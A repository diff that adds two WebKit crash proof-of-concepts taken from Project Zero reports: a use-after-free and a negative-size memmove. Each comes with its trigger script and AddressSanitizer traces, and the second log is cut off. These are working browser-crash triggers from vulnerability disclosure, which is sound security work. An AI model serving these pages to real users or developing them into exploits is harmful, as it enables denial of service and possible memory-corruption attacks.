Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==26782==ABORTING
-->

175
platforms/multiple/dos/41809.html Executable file
View file

@ -0,0 +1,175 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1082
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the latest nightly build of WebKit. The PoC also crashes Safari 10.0.2 on Mac.
PoC and ASan log follow
PoC:
=================================================================
-->
<script>
function go() {
div.style.setProperty("-webkit-flow-into", "foo");
document.execCommand("fontSize", false, 6);
window.requestAnimationFrame(cb);
h1.attachShadow({mode: "open"});
h1.replaceWith("foo");
}
function cb() {
var a;
//trigger garbage collector
for(var i=0;i<100;i++) {
a = new Uint8Array(1024*1024);
}
textarea.cols = 1;
}
</script>
<body onload=go()>
<textarea id="textarea"></textarea>
<h1 id="h1">
<div id="div" style="perspective: 1px;">
<!--
=================================================================
ASan log:
=================================================================
==531==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800003e340 at pc 0x00010b23f5ab bp 0x7fff5c243c10 sp 0x7fff5c243c08
READ of size 8 at 0x60800003e340 thread T0
#0 0x10b23f5aa in WebCore::Node::treeScope() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x45aa)
#1 0x10b23f568 in WebCore::Node::document() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x4568)
#2 0x10b23eb18 in WebCore::RenderObject::document() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3b18)
#3 0x10d3e9a34 in WebCore::RenderBox::applyTopLeftLocationOffset(WebCore::LayoutPoint&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21aea34)
#4 0x10d3e2bc1 in WebCore::RenderLayer::updateLayerPosition() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21a7bc1)
#5 0x10d3e1fb8 in WebCore::RenderLayer::updateLayerPositions(WebCore::RenderGeometryMap*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21a6fb8)
#6 0x10d3e24cd in WebCore::RenderLayer::updateLayerPositions(WebCore::RenderGeometryMap*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21a74cd)
#7 0x10d3e24cd in WebCore::RenderLayer::updateLayerPositions(WebCore::RenderGeometryMap*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21a74cd)
#8 0x10d3e1e66 in WebCore::RenderLayer::updateLayerPositionsAfterLayout(WebCore::RenderLayer const*, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21a6e66)
#9 0x10bcdbb66 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0b66)
#10 0x10dc5c1c1 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a211c1)
#11 0x10cebc87f in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1c8187f)
#12 0x7fff9a634af3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92af3)
#13 0x7fff9a634782 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92782)
#14 0x7fff9a6342d9 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x922d9)
#15 0x7fff9a62b7d0 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x897d0)
#16 0x7fff9a62ae37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
#17 0x7fff904ba934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
#18 0x7fff904ba76e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
#19 0x7fff904ba5ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
#20 0x7fff8e2e5df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
#21 0x7fff8e2e5225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
#22 0x7fff8e2d9d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
#23 0x7fff8e2a3367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
#24 0x7fff86665193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
#25 0x7fff86663bbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
#26 0x1039b9b73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#27 0x7fff8e1e35ac in start (/usr/lib/system/libdyld.dylib+0x35ac)
0x60800003e340 is located 32 bytes inside of 96-byte region [0x60800003e320,0x60800003e380)
freed by thread T0 here:
#0 0x105f85cf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
#1 0x108fb036f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190136f)
#2 0x10b5e3653 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3a8653)
#3 0x10b5d0752 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x395752)
#4 0x10be98aad in WebCore::HTMLHeadingElement::~HTMLHeadingElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc5daad)
#5 0x1088a1ee7 in JSC::JSCell::callDestructor(JSC::VM&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x11f2ee7)
#6 0x1089a423a in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1>()::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f523a)
#7 0x1089a3f1e in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1>() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f4f1e)
#8 0x1089a3892 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectMarksMode<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1>() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f4892)
#9 0x1089a2212 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectSweepMode<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1>(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f3212)
#10 0x10899f823 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectHasNewlyAllocated<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0>(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f0823)
#11 0x10899a130 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectEmptyMode<(JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0>(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12eb130)
#12 0x108987f80 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectScribbleMode<(JSC::MarkedBlock::Handle::SweepDestructionMode)1>(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d8f80)
#13 0x108987dfc in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d8dfc)
#14 0x108983c54 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d4c54)
#15 0x1089836a8 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d46a8)
#16 0x10898450e in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d550e)
#17 0x1076c3bfa in void* JSC::allocateCell<JSC::JSString>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x14bfa)
#18 0x1076c3758 in JSC::JSString::create(JSC::VM&, WTF::PassRefPtr<WTF::StringImpl>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x14758)
#19 0x1076c3465 in JSC::jsString(JSC::VM*, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x14465)
#20 0x10871d864 in JSC::JSFunction::finishCreation(JSC::VM&, JSC::NativeExecutable*, int, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x106e864)
#21 0x10871d6fd in JSC::JSFunction::create(JSC::VM&, JSC::JSGlobalObject*, int, WTF::String const&, long long (*)(JSC::ExecState*), JSC::Intrinsic, long long (*)(JSC::ExecState*), JSC::DOMJIT::Signature const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x106e6fd)
#22 0x1087b2802 in JSC::JSObject::putDirectNativeFunction(JSC::VM&, JSC::JSGlobalObject*, JSC::PropertyName const&, unsigned int, long long (*)(JSC::ExecState*), JSC::Intrinsic, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1103802)
#23 0x10bb5bf3a in JSC::reifyStaticProperty(JSC::VM&, JSC::PropertyName const&, JSC::HashTableValue const&, JSC::JSObject&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x920f3a)
#24 0x10c2a4fc8 in void JSC::reifyStaticProperties<32u>(JSC::VM&, JSC::HashTableValue const (&) [32u], JSC::JSObject&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1069fc8)
#25 0x10c7ca738 in WebCore::JSHTMLTextAreaElementPrototype::finishCreation(JSC::VM&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x158f738)
#26 0x10c7cab8b in WebCore::JSHTMLTextAreaElementPrototype::create(JSC::VM&, JSC::JSGlobalObject*, JSC::Structure*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x158fb8b)
#27 0x10c7caad5 in WebCore::JSHTMLTextAreaElement::createPrototype(JSC::VM&, JSC::JSGlobalObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x158fad5)
#28 0x10c6d7c6f in JSC::Structure* WebCore::getDOMStructure<WebCore::JSHTMLTextAreaElement>(JSC::VM&, WebCore::JSDOMGlobalObject&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x149cc6f)
#29 0x10c6d7a8d in std::__1::enable_if<std::is_same<WebCore::HTMLTextAreaElement, WebCore::HTMLTextAreaElement>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLTextAreaElement>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLTextAreaElement, WebCore::HTMLTextAreaElement>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLTextAreaElement>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x149ca8d)
previously allocated by thread T0 here:
#0 0x105f85790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
#1 0x7fff867345a0 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x25a0)
#2 0x108fb9db4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190adb4)
#3 0x108faf12b in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190012b)
#4 0x108f46995 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1897995)
#5 0x10be4b45d in WebCore::HTMLDivElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1045d)
#6 0x10be67451 in WebCore::divConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2c451)
#7 0x10be65373 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2a373)
#8 0x10be22ea6 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe7ea6)
#9 0x10be221a5 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe71a5)
#10 0x10be228e6 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe78e6)
#11 0x10bf7ef63 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd43f63)
#12 0x10bf7c4d6 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd414d6)
#13 0x10bf7a67e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd3f67e)
#14 0x10be4fd48 in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14d48)
#15 0x10be4f902 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14902)
#16 0x10be4eb94 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc13b94)
#17 0x10be5058d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1558d)
#18 0x10b8bd661 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x682661)
#19 0x10b9e91f8 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae1f8)
#20 0x10b9ad86f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)
#21 0x10b48dfb7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x252fb7)
#22 0x10b488b69 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24db69)
#23 0x10da397e4 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe7e4)
#24 0x1042af615 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de615)
#25 0x1042aec2a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8ddc2a)
#26 0x103c5d1f9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x28c1f9)
#27 0x103a80448 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xaf448)
#28 0x103a89614 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb8614)
#29 0x108f65ab3 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b6ab3)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x45aa) in WebCore::Node::treeScope() const
Shadow bytes around the buggy address:
0x1c1000007c10: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000007c20: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1000007c30: fa fa fa fa 00 00 00 00 00 00 00 fc fc 00 00 fa
0x1c1000007c40: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c1000007c50: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
=>0x1c1000007c60: fa fa fa fa fd fd fd fd[fd]fd fd fd fd fd fd fd
0x1c1000007c70: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1000007c80: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c1000007c90: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c1000007ca0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c1000007cb0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==531==ABORTING
-->

137
platforms/multiple/dos/41810.html Executable file
View file

@ -0,0 +1,137 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1087
There is a negative-size memmove security vulnerability in WebKit. The vulnerability was confirmed on a nightly build of WebKit. The PoC has also been observed to crash Safari 10.0.2 on Mac.
PoC (Note: It might take a couple of refreshes to trigger the bug):
=================================================================
-->
<script>
function go() {
var iframe = document.getElementById("iframe");
var iframeWindow = window[0];
var toInsert = div;
var iframeBody = iframeWindow.document.body;
iframeBody.before(document.body);
iframe.after(toInsert);
}
</script>
<body onload=go()>
<form id="form">
<textarea form="form">aaaaaaaa</textarea>
<iframe id="iframe"></iframe>
</form>
<div id="div"><dir><object></object></dir>
<div>
<!--
=================================================================
Preliminary analysis:
Under certain conditions HTMLFormElement::formElementIndex() returns an index that is larger than the size of m_associatedElements. This results in negative memmove in WebCore::HTMLFormElement::registerFormElement.
ASan log:
=================================================================
==1226==ERROR: AddressSanitizer: negative-size-param: (size=-8)
#0 0x10ef32f0b in __asan_memmove (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x41f0b)
#1 0x114e4b3ba in WTF::VectorMover<true, WebCore::FormAssociatedElement*>::moveOverlapping(WebCore::FormAssociatedElement* const*, WebCore::FormAssociatedElement* const*, WebCore::FormAssociatedElement**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc563ba)
#2 0x114e47954 in void WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::insert<WebCore::FormAssociatedElement*&>(unsigned long, WebCore::FormAssociatedElement*&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc52954)
#3 0x114e47770 in WebCore::HTMLFormElement::registerFormElement(WebCore::FormAssociatedElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc52770)
#4 0x114bfe4d8 in WebCore::FormAssociatedElement::setForm(WebCore::HTMLFormElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa094d8)
#5 0x114bfed4e in WebCore::FormAssociatedElement::resetFormOwner() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa09d4e)
#6 0x11458bdb8 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChangeSource) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x396db8)
#7 0x11458ba22 in WebCore::ContainerNode::updateTreeAfterInsertion(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x396a22)
#8 0x11458b192 in WebCore::ContainerNode::insertBefore(WebCore::Node&, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x396192)
#9 0x11608d76f in WebCore::Node::after(WTF::Vector<WTF::Variant<WTF::RefPtr<WebCore::Node>, WTF::String>, 0ul, WTF::CrashOnOverflow, 16ul>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e9876f)
#10 0x1155694f2 in WebCore::jsElementPrototypeFunctionAfterCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x13744f2)
#11 0x11555a371 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionAfterCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1365371)
#12 0x11555a21e in WebCore::jsElementPrototypeFunctionAfter(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x136521e)
#13 0x54b37a201027 (<unknown module>)
#14 0x11192c26c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c526c)
#15 0x11192c26c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c526c)
#16 0x11192583a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12be83a)
#17 0x1115e447d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf7d47d)
#18 0x11156eaa3 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf07aa3)
#19 0x110c60991 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9991)
#20 0x110c60abb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9abb)
#21 0x110c60e06 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9e06)
